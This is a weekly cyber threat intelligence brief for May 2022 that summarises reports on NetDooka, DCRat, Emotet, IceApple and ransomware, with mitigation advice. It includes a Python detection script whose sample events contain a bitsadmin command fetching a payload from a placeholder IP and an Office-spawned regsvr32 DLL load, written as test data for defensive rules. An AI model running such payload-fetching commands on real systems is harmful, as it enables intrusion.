Cyber Intel Brief: May 05 – 11, 2022
By Eric Ford
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service
- Trend Micro discovered a pay-per-install service that uses the PrivateLoader malware for distributing a sophisticated malware framework, dubbed NetDooka.
- The framework consists of a loader, a dropper, a full-featured remote access trojan (RAT) with its own network communication protocol, and a driver that protects the RAT from being deleted or having its process terminated.
- Observation of this activity may be possible by monitoring for process or command activity related to bitsadmin.exe.
Mitigation recommendations include ensuring anti-virus and EDR solutions are up to date and functioning properly; providing user awareness training that covers company policies and procedures for obtaining authorized software; adding the techniques outlined in the report to your phishing awareness and simulation exercise program; and finally, ensuring that software is up to date, with vulnerabilities listed in CISA’s Known Exploited Vulnerabilities Catalog receiving priority.
Dirty Deeds Done Dirt Cheap: Russian RAT Offers Backdoor Bargains
- BlackBerry recently analyzed the latest version of DCRat, including how it is distributed and marketed.
- DCRat offers a modular framework that includes custom plugins from both the author and third-party sources and is sold to threat actors on Russian cybercrime forums.
- Observation of this activity may be possible by monitoring for registry changes involving the keys listed here.
Mitigation recommendations include ensuring anti-virus and EDR solutions are up to date and functioning properly, implementing a phishing awareness training and simulation exercise program, and finally, enforcing multi-factor authentication.
Emotet: The Return of the World’s Most Dangerous Malware
- Forescout’s Vedere Labs analyzed a recent Emotet sample and detailed the process Emotet follows to begin the infection.
- In this sample the infection chain begins once the user enables the macro in an attached Microsoft Excel file; the macro downloads a DLL that is then executed with regsvr32.
- Observation of this activity may be possible by monitoring for suspicious process and command activity involving regsvr32.
Mitigation recommendations include disabling macro execution via group policy settings, installing and maintaining antivirus software, implementing a phishing awareness training and simulation exercise program, and finally, enforcing multi-factor authentication.
Novel IceApple Post-Exploitation Framework Detected by CrowdStrike
- CrowdStrike recently discovered a new post-exploitation framework, dubbed IceApple, that is used to conduct discovery, credential harvesting, file and directory deletion, and data exfiltration.
- When employed, IceApple was observed being used for credential harvesting and reconnaissance with data exfiltration primarily occurring shortly after initial access was gained.
- Observation of this activity may be possible by monitoring for traffic containing the user agent “Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4551; Pro)”.
Mitigation recommendations include ensuring all web applications, especially Microsoft Exchange, are regularly and fully patched, reviewing internet-facing architecture to include segmentation from the internal business network, implementing multi-factor authentication for remote access, and finally, installing advanced security protection systems at the host level to detect and report on malicious or anomalous activity.
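The three observables called out above (bitsadmin.exe activity for NetDooka/PrivateLoader, regsvr32 loading a DLL for Emotet, and the IceApple user agent) can be expressed as simple detection rules. The following is an added example written for this brief, not code from Trend Micro, Forescout, CrowdStrike or the Deepwatch Threat Intel Team. The telemetry is constructed, the set of BITSAdmin switches treated as downloads and the list of user-writable paths are assumptions made here to separate likely-malicious use from routine administration, and only the IceApple user-agent string is taken verbatim from the report summary above.

```python
"""Toy detection rules for the observables in this brief.

Added example; the sample events below are constructed, not real telemetry.
Process events mimic a Sysmon Event ID 1 / EDR process-create record, web
events mimic a proxy or IIS access log.
"""
import re

# Exact user-agent string reported for IceApple (from the brief).
ICEAPPLE_UA = "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4551; Pro)"

# Assumption: these BITSAdmin switches are the ones that fetch a remote file.
# The brief itself only names bitsadmin.exe, not specific switches.
BITS_DOWNLOAD_SWITCHES = re.compile(r"/(transfer|addfile|setnotifycmdline|resume)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)

# Assumption: paths a standard user can write to. A DLL registered from one of
# these is a much stronger signal than one under Program Files or System32.
USER_WRITABLE_RE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp|Temp)\\", re.I)

# Office binaries that should not normally spawn regsvr32 (macro -> DLL chain).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample telemetry.
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://198.51.100.7/x.bin C:\Users\Public\x.bin",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers",           # benign inventory
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Users\alice\AppData\Local\Temp\ueuw.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll",  # installer
     "parent": r"C:\Windows\System32\msiexec.exe"},
]
HTTP_EVENTS = [
    {"src": "203.0.113.5", "uri": "/owa/auth/logon.aspx", "ua": ICEAPPLE_UA},
    {"src": "203.0.113.9", "uri": "/owa/",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36"},
]


def image_name(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_bitsadmin(ev):
    """bitsadmin.exe with a download switch and a URL on the command line."""
    if image_name(ev["image"]) != "bitsadmin.exe":
        return None
    cmd = ev["cmdline"]
    if BITS_DOWNLOAD_SWITCHES.search(cmd) and URL_RE.search(cmd):
        return "bitsadmin_download"
    return None


def check_regsvr32(ev):
    """regsvr32.exe registering a DLL from a user-writable path or spawned by Office."""
    if image_name(ev["image"]) != "regsvr32.exe":
        return None
    reasons = []
    if USER_WRITABLE_RE.search(ev["cmdline"]):
        reasons.append("user_writable_dll")
    if image_name(ev["parent"]) in OFFICE_APPS:
        reasons.append("office_parent")
    return "regsvr32_" + "+".join(reasons) if reasons else None


def check_user_agent(ev):
    """Exact match on the IceApple user agent; trivially changed by the actor."""
    return "iceapple_user_agent" if ev.get("ua") == ICEAPPLE_UA else None


def scan(process_events, http_events):
    """Run every rule over the events and return (rule_name, evidence) pairs."""
    findings = []
    for ev in process_events:
        for rule in (check_bitsadmin, check_regsvr32):
            hit = rule(ev)
            if hit:
                findings.append((hit, ev["cmdline"]))
    for ev in http_events:
        hit = check_user_agent(ev)
        if hit:
            findings.append((hit, f"{ev['src']} {ev['uri']}"))
    return findings


if __name__ == "__main__":
    for name, evidence in scan(PROCESS_EVENTS, HTTP_EVENTS):
        print(f"{name:45} {evidence}")
```

On the constructed data the bitsadmin inventory command and the installer-driven regsvr32 call pass through while the download, the Office-spawned DLL load from a Temp directory, and the IceApple user agent are flagged. Both bitsadmin.exe and regsvr32.exe are legitimately used by administrators and installers, so the parent-process and path conditions are what keep these rules from being pure noise; the user-agent match is an exact-string indicator and should be treated as a short-lived signature rather than a durable detection.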
Ransomware-as-a-Service: Understanding the Cybercrime Gig Economy and How to Protect Yourself
- Microsoft recently profiled several affiliates of ransomware-as-a-service (RaaS) operations, including a deep dive into individual groups and recommendations to mitigate the risk they pose.
- Microsoft describes the current RaaS economy, detailing how initial access brokers, affiliates, and RaaS operators coordinate to compromise targets, and profiles seven threat groups it currently tracks.
Mitigation recommendations include patching systems as soon as possible with a priority placed on those systems that are internet-exposed and a focus on known exploited vulnerabilities like those featured in CISA’s Known Exploited Vulnerabilities Catalog; ensuring anti-virus and EDR solutions are up to date, functioning properly, and hardened to vendor’s specifications; for credential hygiene, it is recommended to implement Microsoft’s guidance, available here; and finally, customers of Microsoft 365 Defender, Defender for Endpoint, and Defender Antivirus can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks.
Ransomware Tracker: The Latest Figures [May 2022]
- The Record, a Recorded Future company, released its latest figures for ransomware trends for the month of April. The tracker is updated on the 10th of every month.
- Even though overall ransomware incidents remained stable, Conti showed an increase in activity, with 50 incidents deploying the ransomware variant. These included the attack on the Costa Rican government that forced it to declare a state of emergency; the US State Department subsequently announced a reward for information leading to the identification or location of key Conti members, or to the arrest or conviction of anyone participating in a Conti incident.
To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
CISA Adds Two Vulnerabilities to the Known Exploited Vulnerabilities Catalog
- CISA has added two vulnerabilities to its Known Exploited Vulnerabilities Catalog based on reliable evidence that these vulnerabilities have been actively exploited in the wild.
- The software affected includes F5 BIG-IP and Microsoft Windows.
Deepwatch Threat Intel Team strongly urges all customers to prioritize rapid remediation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities Catalog, as part of their vulnerability management process.
What We Mean When We Say
Estimates of Likelihood
We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” and “may” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.
Confidence in Assessments
Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:
- High confidence indicates that our judgments are based on reliable information and/or that the nature of the problem allows us to make a sound judgment. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
- Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
- Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.